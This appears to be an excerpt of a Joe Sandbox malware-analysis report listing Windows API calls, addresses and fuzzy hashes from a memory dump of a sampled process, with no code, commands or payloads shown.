Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
APIs
• GetCurrentProcessId.KERNEL32 ref: 008DAD86
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008DAD94
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 008DADC7
• CloseHandle.KERNEL32(?), ref: 008DAF9C
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
  • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
  • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD350
  • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3C7
  • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3FD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC404
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC45F
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008DC4C2
• RegCloseKey.ADVAPI32(?,?), ref: 008DC505
• RegCloseKey.ADVAPI32(00000000), ref: 008DC512
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
  • Part of subcall function 008BE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008BD6E2,?), ref: 008BE629
  • Part of subcall function 008BE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008BD6E2,?), ref: 008BE642
  • Part of subcall function 008BE9C5: GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
• lstrcmpiW.KERNEL32(?,?), ref: 008BEC9F
• MoveFileW.KERNEL32(?,?), ref: 008BECD8
• _wcslen.LIBCMT ref: 008BEE17
• _wcslen.LIBCMT ref: 008BEE2F
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008BEE7C
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetInputState.USER32 ref: 008C4225
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 008C427C
• TranslateMessage.USER32(?), ref: 008C42A5
• DispatchMessageW.USER32(?), ref: 008C42AF
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C42C0
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
APIs
• GetWindowRect.USER32(?,?), ref: 008B21A5
• PostMessageW.USER32(00000001,00000201,00000001), ref: 008B2251
• Sleep.KERNEL32(00000000,?,?,?), ref: 008B2259
• PostMessageW.USER32(00000001,00000202,00000000), ref: 008B226A
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 008B2272
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 008E60A4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 008E60FC
• _wcslen.LIBCMT ref: 008E610E
• _wcslen.LIBCMT ref: 008E6119
• SendMessageW.USER32(?,00001002,00000000,?), ref: 008E6175
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?,?,008B0BEE), ref: 008B08BB
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?), ref: 008B08D6
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?), ref: 008B08E4
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?), ref: 008B08F4
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B07D1,80070057,?,?), ref: 008B0900
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                            • Opcode ID: 8b755897ecf0df89653944dd1bbb13e916f343199f7e31173c1ab577cd559506
                                                                                                                                                                            • Instruction ID: 7c9b4c76311e65f542f647a6aac2b95907ffe93370a6d18789acca1ed3a1f00c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b755897ecf0df89653944dd1bbb13e916f343199f7e31173c1ab577cd559506
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B018F72600318AFDB114F64DC44BAB7ABDFB48791F204434F905DA321E771DE008BA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0BE0
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0BED
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0BFA
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0C07
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0C14
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,008C0A39,?,008C3C56,?,00000001,00893ACE,?), ref: 008C0C21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: f9b9a58bd6eba73107fd93a71e82fe05d09a3950dea58ade0574f243382a9056
                                                                                                                                                                            • Instruction ID: f6929d0c07d64ab6c3be83709026b4d89ba59fabafa9bc2554af847c97362a29
                                                                                                                                                                            • Opcode Fuzzy Hash: f9b9a58bd6eba73107fd93a71e82fe05d09a3950dea58ade0574f243382a9056
                                                                                                                                                                            • Instruction Fuzzy Hash: 3101AE75800B16DFCB30AF66D980816FBF9FF503593158A3ED1A292931C7B1A989CF80
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 008B64E7
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 008B64FE
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 008B6516
                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 008B6532
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008B654C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                            • Opcode ID: 9fb21f67156bf608f5271f824d8bb64887343d81465e32316bb91d312b7f6e25
                                                                                                                                                                            • Instruction ID: 7f1d70747e13671d6300da1abe9c8c4c9940eaa4aed576922b6ab9f56d527c94
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fb21f67156bf608f5271f824d8bb64887343d81465e32316bb91d312b7f6e25
                                                                                                                                                                            • Instruction Fuzzy Hash: B3018630500708ABEB305B54DD8EBD67778FB10705F000559B587A50E1EBF4AAA8CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 0088264E
                                                                                                                                                                              • Part of subcall function 00882D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4), ref: 00882D6E
                                                                                                                                                                              • Part of subcall function 00882D58: GetLastError.KERNEL32(00921DC4,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4,00921DC4), ref: 00882D80
                                                                                                                                                                            • _free.LIBCMT ref: 00882660
                                                                                                                                                                            • _free.LIBCMT ref: 00882673
                                                                                                                                                                            • _free.LIBCMT ref: 00882684
                                                                                                                                                                            • _free.LIBCMT ref: 00882695
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 4edbb8f353aea821c0104cae62c3b31852c557b05488f33c0bbe514542259345
                                                                                                                                                                            • Instruction ID: c1e1b76f4c2dee68f4325846e9532d91bbb14a5f90df3a3641ab5e8f99977628
                                                                                                                                                                            • Opcode Fuzzy Hash: 4edbb8f353aea821c0104cae62c3b31852c557b05488f33c0bbe514542259345
                                                                                                                                                                            • Instruction Fuzzy Hash: F0F0DA7092A2249BC726BF5CBE058883BA4FB28751305864AF434D6275C7720953BF85
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008BCAC6
                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 008BCB0C
                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00922990,00FF57C0), ref: 008BCB55
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                            • Opcode ID: 34ef8e36a90e4fb74b3ec040d424a0cfce3d6c6004172254fd0825841a53cf48
                                                                                                                                                                            • Instruction ID: fe8d7aea331b1a2364b4bb75f267da0effb54d78c54bbfa992601e1c5f1ec1a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 34ef8e36a90e4fb74b3ec040d424a0cfce3d6c6004172254fd0825841a53cf48
                                                                                                                                                                            • Instruction Fuzzy Hash: D6418C702093419FD720DF28C886F9ABBE8FF94324F14461DE9A5D7392D730A904CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008E489F
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008E48B3
                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008E48D7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                            • Opcode ID: eabb7672c8a42dd1b684252f83de89962a6c36b0167843bcebaf6778a5e83119
• Instruction ID: 31aa0547fc7ed20e4329316e153d5ddf73a5cccf2c981d9ba3573afd56363204
• Opcode Fuzzy Hash: eabb7672c8a42dd1b684252f83de89962a6c36b0167843bcebaf6778a5e83119
• Instruction Fuzzy Hash: 1521D332600269BFDF218F94CC86FEA3B65FF49714F110124FA19AB1D0D6B1A8559B90
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008E419F
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008E41AF
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008E41D5
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 55083dd11923295f2975a1b43116bb9fd37b2d93813b7bc767133b90de920879
• Instruction ID: 0a54de7cfab1e26c4e8bf137349f22cb13185d059f11489bf1e02f1af575fd79
• Opcode Fuzzy Hash: 55083dd11923295f2975a1b43116bb9fd37b2d93813b7bc767133b90de920879
• Instruction Fuzzy Hash: E421D132610258BBEF218F55DC84EEB376EFF9A754F118124FA08DB190C6719C9287A0
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008E4BAE
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008E4BC3
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008E4BD0
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 0837afdac495151eb961d1f7ca7aa6105002a55b1e01682ef6eda6e3b984a851
• Instruction ID: 55e6218a55bf2cdb0e90fe33b32aec5647acbbcf8ed8babf6e1b779b225af61f
• Opcode Fuzzy Hash: 0837afdac495151eb961d1f7ca7aa6105002a55b1e01682ef6eda6e3b984a851
• Instruction Fuzzy Hash: 15110631240248BEEF215FA9CC46FAB77A8FFC6B64F114514FA59E60A0D671DC619B20
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E6220
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E624D
• DrawMenuBar.USER32(?), ref: 008E625C
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: 333f6d8dcf123104118efc012fea4b227a24c1fdef7c93c673ef0ea029f80359
• Instruction ID: 67df54d46548611d563c0f4246abc4f5851ec3a55ad4b802e9e77b8a837c4418
• Opcode Fuzzy Hash: 333f6d8dcf123104118efc012fea4b227a24c1fdef7c93c673ef0ea029f80359
• Instruction Fuzzy Hash: DD01A971604288EFDB209F56CC88BAE7BB4FF46355F0480A9F949DA150DB308994EF31
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ef78c85cecb26d2e8134cea27d855deb5daddacbb6c2d61016b868ef4853628
• Instruction ID: aa0f75afdd33a3fd2043d3bf2634ba79c26f8f06303d5ec259bb806ab2300be9
• Opcode Fuzzy Hash: 4ef78c85cecb26d2e8134cea27d855deb5daddacbb6c2d61016b868ef4853628
• Instruction Fuzzy Hash: 66C14B75A0021AEFDB14CF94C894AAABBB5FF48714F208599E505EB351D731ED81CF90
APIs
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
• Instruction ID: dad0a22d35b977cb68bf04ea3a89eca6051ae215b067a789fc7d3f73b302f58a
• Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
• Instruction Fuzzy Hash: 9FA1457390538B9FEB21EF68C891BAEBBE4FF15310F284169E585DB282C2389D41C755
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008F0BD4,?), ref: 008B0E80
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008F0BD4,?), ref: 008B0E98
• CLSIDFromProgID.OLE32(?,?,00000000,008EDCE0,000000FF,?,00000000,00000800,00000000,?,008F0BD4,?), ref: 008B0EBD
• _memcmp.LIBVCRUNTIME ref: 008B0EDE
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: d8e4594594ef93ddf44167b2ef12898f504e31acc1c260d6a59ff89fa74aec7a
• Instruction ID: 8406a73fd296202085b6ca51042f115c480dd82fc7d5182386e548928c91af77
• Opcode Fuzzy Hash: d8e4594594ef93ddf44167b2ef12898f504e31acc1c260d6a59ff89fa74aec7a
• Instruction Fuzzy Hash: 67810771A00209AFCB14DF94C984EEEB7B9FF89315F204558E506EB250DB71AE4ACB61
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 008D245A
• WSAGetLastError.WSOCK32 ref: 008D2468
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008D24E7
• WSAGetLastError.WSOCK32 ref: 008D24F1
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: cffe37bfab0bb4daec022d705b0b1136be6cea79307aae07f08f527e47fbd31e
• Instruction ID: f59837b11f4d0de7cb555ba8019dfb2bd2b68781f94b64ca194292948d9dfffd
• Opcode Fuzzy Hash: cffe37bfab0bb4daec022d705b0b1136be6cea79307aae07f08f527e47fbd31e
• Instruction Fuzzy Hash: 1341CE34600200AFEB20AF28D89AF2A77E5FB14718F54C589F919DF3D2C672ED418B91
APIs
• GetWindowRect.USER32(?,?), ref: 008E6C41
• ScreenToClient.USER32(?,?), ref: 008E6C74
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008E6CE1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                            • Opcode ID: 49e5a9eae07f629b924e7ef7d70beafa02307b61d32674ac7bf1844c18aa61e0
                                                                                                                                                                            • Instruction ID: c395629adc4021ca5231c15a98ba63cdfa953cfb87542a61237bc108016d7a99
                                                                                                                                                                            • Opcode Fuzzy Hash: 49e5a9eae07f629b924e7ef7d70beafa02307b61d32674ac7bf1844c18aa61e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 18514174A01249EFCF24CF55C9809AE7BB5FF563A0F208159F865DB2A0E731AD91CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008C60DD
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 008C6103
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008C6128
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008C6154
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
